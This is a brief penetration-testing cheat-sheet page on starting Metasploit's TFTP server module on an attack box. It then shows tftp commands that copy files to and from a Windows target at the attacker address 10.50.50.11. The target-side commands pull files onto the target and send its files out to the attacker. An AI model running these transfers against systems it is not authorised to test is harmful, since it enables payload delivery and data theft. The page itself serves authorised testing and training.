Skip to main content

TFTP

If the target has a TFTP client installed, Metasploit has a TFTP server you can run ad-hoc on your attack box to transfer files https://www.rapid7.com/db/modules/auxiliary/server/tftp/

Attack Box Side

# Start Metasploit Framework
sudo msfconsole

# Start a TFTP server and server files out of the /tmp/evil directory
msf6> use auxiliary/server/tftp
msf6> set OUTPUTPATH /tmp/evil
msf6> set TFTPROOT /tmp/evil
msf6> run

# Stop the TFTP server
# List jobs and find server job
msf6> jobs
# Kill TFTP server job with an ID of 1
msf6> jobs -k 1

 

Target Side

# Copy a file from the Attack Box to the target
# Assumes the Attack Box IP is 10.50.50.11
tftp -i 10.50.50.11 GET filename.txt C:\Windows\Temp\filename.txt

# Copy a file to the Attack Box
# Assumes the Attack Box IP is 10.50.50.11
# This will put the file in /tmp/evil
tftp -i 10.50.50.11 PUT C:\Windows\Temp\filename.txt filename.txt

Back to top